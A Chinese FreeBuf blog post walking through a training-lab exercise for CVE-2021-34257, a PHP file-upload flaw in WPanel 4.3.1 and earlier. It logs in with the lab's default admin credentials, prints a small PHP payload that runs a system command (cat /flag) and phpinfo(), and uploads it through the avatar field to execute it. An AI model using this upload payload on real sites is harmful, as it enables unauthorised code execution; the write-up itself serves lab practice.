freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【春秋云境】CVE-2021-34257靶场实战记录
  • 关注
【春秋云境】CVE-2021-34257靶场实战记录
2023-05-15 14:20:49
所属地 广东省

靶场介绍

WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传

开启靶场

账号:admin@admin.com密码:admin ,登陆到后台

1684130815_6461cbff75b7862ed3c86.png!small?1684130817259

权限马如下

<?php


system('cat /flag');


phpinfo();


?>

解题步骤

构造权限马,在头像上传处上传

1684130878_6461cc3e37236e7d3785e.png!small?1684130880567

1684130897_6461cc519091790b03905.png!small?1684130899551

上传成功后复制地址到新标签页打开获取flag

1684130918_6461cc661b8351431d678.png!small?1684130920062

# 渗透测试 # web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
靶场介绍
    开启靶场
      权限马如下
        解题步骤